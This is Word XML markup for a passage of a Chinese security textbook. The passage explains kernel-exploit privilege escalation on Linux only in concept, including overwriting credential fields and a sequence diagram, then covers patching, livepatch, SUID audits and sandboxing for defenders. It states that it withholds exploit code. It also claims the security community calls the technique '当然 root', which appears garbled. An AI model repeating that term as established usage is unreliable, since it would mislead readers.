    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从攻击者视角看，提权的理想终点是获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限。第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节已经展示了利用配置错误（SUID、sudo、cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）进行提权的路线，这些错误本质上是用户态发生的“权限授予偏差”——某个本不该拥有高权限的进程或文件，因为配置失误被赋予了高权限。然而，还存在一条更彻底却也更难防御的攻击路径：利用操作系统内核本身的漏洞，直接跨越用户态与内核态的边界，在最高特权级（ring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0）上执行攻击者控制的代码。这正是本节要讨论的核心概念——内核漏洞提权，以及在此基础上构建的纵深防御体系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从防御者视角看，内核漏洞提权是必须正视的威胁类别，但不应将防御策略窄化为“修补每一个内核</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE”。相反，蓝队的防御重点在于：通过补丁管理降低已知漏洞的暴露窗口，通过最小权限与内核加固限制攻击者即使进入内核态后能造成的破坏，并通过监控与审计在异常提权行为发生时产生告警。这种纵深防御思想，使得内核漏洞提权不再是一个单纯的“漏洞与补丁”问题，而是一个需要体系化工程防护的安全工程问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="275"/>
    <w:bookmarkStart w:id="277" w:name="内核漏洞提权的工作原理直觉"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核漏洞提权的工作原理直觉</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代操作系统将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">特权级划分为至少两个层次：用户态（ring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3，普通进程运行之处）与内核态（ring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0，操作系统内核与驱动运行之处）。这一隔离是操作系统安全的基石——普通进程不能随意读取内核内存，不能随意修改页表，不能直接操作硬件。然而，这一隔离完全依赖内核代码自身的正确实现。一旦内核代码中存在内存破坏漏洞（如缓冲区溢出、释放后使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">use-after-free、竞态条件等），攻击者便可能从用户态触发这些漏洞，导致内核执行攻击者设计的行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核漏洞提权的典型过程可以这样形象理解：普通用户进程像是一个只能在自己房间里活动的租客，而内核是掌握所有房屋钥匙的管理员。正常情况下，租客只能通过敲门（系统调用）请求管理员帮忙做一些事情，管理员会验证请求是否合法。但如果门板本身不够坚固——例如，管理员在抄写租客名字时，租客故意给了一个超长的名字，导致墨水溢出到了管理员指令簿的“下一个任务”栏目——租客就可以操纵管理员去执行原本不被允许的操作，比如打开所有房间的锁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术上说，大多数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核漏洞利用依赖以下一种或多种模式：利用内核栈/堆溢出覆盖关键数据结构（如进程凭证结构</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cred</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），劫持内核控制流并执行内核空间的代码，或通过任意地址读写修改内核内存中的安全关键字段。其中一个最经典的概念是利用内核漏洞将进程的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段改写为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0（root），从而使得用户态进程在返回用户态时直接获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份。这一过程被安全社区广泛称为“当然</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root”（privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> escalation to root via kernel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">必须强调的武器化红线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：上述描述仅为概念性原理阐释，旨在帮助读者理解内核漏洞提权所属的抽象层次和利用思想。本章不提供任何可用在真实系统上的完整内核</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit；不提供利用代码的编写方法；不讨论如何绕过内核缓解机制（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">KASLR、SMEP/SMAP、KPTI）的具体技术；不引用或杜撰具体</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编号及其武器化载荷。所有关于内核漏洞利用的技术细节，应以软件厂商官方安全公告和公开的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC（概念验证，proof-of-concept）代码为准，且仅允许在隔离授权的环境中以研究为目的复现。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="276" w:name="内核漏洞提权的典型概念流程"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核漏洞提权的典型概念流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即便不涉及任何具体</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE，我们也可以用概念层级的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mermaid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">序列图来表达一次典型的内核漏洞提权交互：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant Attacker as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (user)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant Kernel as Linux Kernel</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over Attacker,Kernel: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正常系统调用路径</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker-&gt;&gt;Kernel: syscall(ex, write, ioctl...)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kernel-&gt;&gt;Kernel: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核代码处理参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over Kernel: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞触发&lt;br/&gt;内存破坏/竞争条件</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kernel--&gt;&gt;Kernel: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">控制流被劫持或关键数据被改写</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kernel-&gt;&gt;Attacker: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回用户态&lt;br/&gt;进程凭证已被提升</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over Attacker: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这段示意流程揭示了内核漏洞提权与用户态溢出的本质共性：都是利用了代码未能正确处理不可信输入，导致内存层面的破坏，最终转向攻击者控制的逻辑。区别在于，内核态漏洞的破坏范围远超单个用户进程——一旦内核被攻破，整个系统的一切安全保证都悬于一线。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="276"/>
    <w:bookmarkEnd w:id="277"/>
    <w:bookmarkStart w:id="282" w:name="提权的纵深防御体系"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权的纵深防御体系</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">既然内核漏洞可能存在于复杂的操作系统内核代码中，并且其发现与利用技术在攻击社区中不断演进，防御者就不能仅寄希望于“没有漏洞”——必须构建由多层防护组成的纵深防御体系。本节按照“事前预防→事中隔离→事后检测”的逻辑组织这一防御体系。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="278" w:name="补丁管理与已知漏洞消除"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">补丁管理与已知漏洞消除</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对内核漏洞的最直接防御，是确保已知漏洞被及时修补。然而，在真实运维环境中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“及时”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二字往往面临挑战：生产系统不能随意重启、补丁兼容性需要测试、嵌入式或老旧内核难以升级。因此，蓝队需要建立一套以风险为导向的补丁管理策略：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞情报与优先级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过订阅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发行版安全公告、MITRE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列表、NVD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等渠道获取漏洞信息，但不盲目修补所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE——需结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">评分、攻击向量是否可达（本地/远程）、是否需要用户交互、是否有公开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PoC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等因素评定优先级。优先修补“可本地提权且</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PoC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">公开”的内核漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内核热补丁（livepatch）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对于无法立即重启的关键系统，可利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> livepatch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制在不重启的情况下修补函数。这一技术已在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RHEL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等发行版中成熟应用，但热补丁的适用范围有限（通常仅用于修补函数级的漏洞，无法修补数据结构布局级的问题），且本身需要严格测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内核版本策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：部分企业选择长期支持（LTS,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Long-Term </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Support）内核，以在稳定性和安全修复之间取得平衡。然而，过度滞后的内核版本可能无法获得最新缓解机制的硬件使能（如较新的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">特性需要新内核支持），蓝队需要在“稳定”与“安全”之间做出有意识的权衡决策。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="278"/>
    <w:bookmarkStart w:id="279" w:name="最小权限与-suid-审计"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即使攻击者利用内核漏洞成功提权到了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root，防御体系也不应就此彻底失败。纵深防御的核心信条是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">在每一层假设攻击者已经突破了外层的防护，内层仍然要设置障碍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。最小权限原则在此同样适用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">降低触发面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者要触发内核漏洞，通常需要在内核中执行特定代码路径，而这些路径的入口往往是通过系统调用（syscall）或设备文件交互。如果攻击者没有机会调用危险的内核接口（例如因为容器沙箱、seccomp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤器、或简单的文件系统权限限制），则即便漏洞存在也难以被利用。限制普通用户可以访问的设备文件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/mem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/kmem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）和可加载的内核模块，能够显著收缩攻击面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">二进制审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节详细讨论的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序审计在内核漏洞防御中同样重要。SUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限运行，其内部如果存在漏洞，攻击者便可在无需触发内核漏洞的情况下直接获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root。然而，换个角度看，如果系统的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击面被严格审计和缩减，攻击者便更可能被迫寻找更困难的攻击路径（如内核漏洞），这本身就构成了防御纵深的一部分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">容器与沙箱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
